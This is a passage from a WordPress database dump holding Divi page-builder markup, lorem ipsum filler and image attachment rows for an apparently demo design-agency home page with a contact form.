background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','publish','closed','closed','','home','','','2022-12-08 06:54:06','2022-12-08 06:54:06','',0,'https://52.66.212.87/?page_id=134',0,'page','',0),(135,1,'2020-07-02 20:14:48','2020-07-02 20:14:48','<!-- wp:divi/placeholder /-->','','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 20:14:48','2020-07-02 20:14:48','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(137,1,'2020-07-02 20:15:33','2020-07-02 20:15:33','<!-- wp:divi/placeholder /-->','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 20:15:33','2020-07-02 20:15:33','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(138,1,'2020-07-02 20:15:57','2020-07-02 20:15:57','','home-office-07-1','','inherit','open','closed','','home-office-07-1','','','2020-07-02 20:15:57','2020-07-02 20:15:57','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png',0,'attachment','image/png',0),(139,1,'2020-07-02 20:16:15','2020-07-02 20:16:15','','home-office-03','','inherit','open','closed','','home-office-03','','','2020-07-02 20:16:15','2020-07-02 20:16:15','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg',0,'attachment','image/jpeg',0),(140,1,'2020-07-02 20:16:16','2020-07-02 20:16:16','','home-office-04','','inherit','open','closed','','home-office-04','','','2020-07-02 20:16:16','2020-07-02 20:16:16','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg',0,'attachment','image/jpeg',0),(142,1,'2020-07-02 20:16:21','2020-07-02 20:16:21','','MB-purefront-02','','inherit','open','closed','','mb-purefront-02','','','2020-07-02 20:16:21','2020-07-02 20:16:21','',0,'https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png',0,'attachment','image/png',0),(143,1,'2020-07-02 20:16:25','2020-07-02 20:16:25','','portraits-circle-small_1','','inherit','open','closed','','portraits-circle-small_1','','','2020-07-02 20:16:25','2020-07-02 20:16:25','',0,'https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png',0,'attachment','image/png',0),(144,1,'2020-07-02 20:16:25','2020-07-02 20:16:25','','portraits-circle-small_3','','inherit','open','closed','','portraits-circle-small_3','','','2020-07-02 20:16:25','2020-07-02 20:16:25','',0,'https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png',0,'attachment','image/png',0),(145,1,'2020-07-02 20:16:25','2020-07-02 20:16:25','','portraits-circle-small_2','','inherit','open','closed','','portraits-circle-small_2','','','2020-07-02 20:16:25','2020-07-02 20:16:25','',0,'https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png',0,'attachment','image/png',0),(146,1,'2020-07-02 20:16:25','2020-07-02 20:16:25','','portraits-circle-small_5','','inherit','open','closed','','portraits-circle-small_5','','','2020-07-02 20:16:25','2020-07-02 20:16:25','',0,'https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png',0,'attachment','image/png',0),(148,1,'2020-07-02 20:16:56','2020-07-02 20:16:56','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/circle-background-pattern.png\" width=\"100%\" width_tablet=\"100%\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|500||on|||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_letter_spacing=\"3px\" custom_margin=\"||45px|\" animation_style=\"slide\" animation_direction=\"bottom\" locked=\"off\"]We are a full service\r[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"||40px|\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Creative <br /><span style=\"color: #353740;\">Design Agency</span></h1>[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" custom_margin=\"||50px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"17%\" locked=\"off\"]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has normal.\r[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/business_01.jpg\" parallax=\"on\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\" column_structure=\"1_4,1_4,1_4,1_4\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" 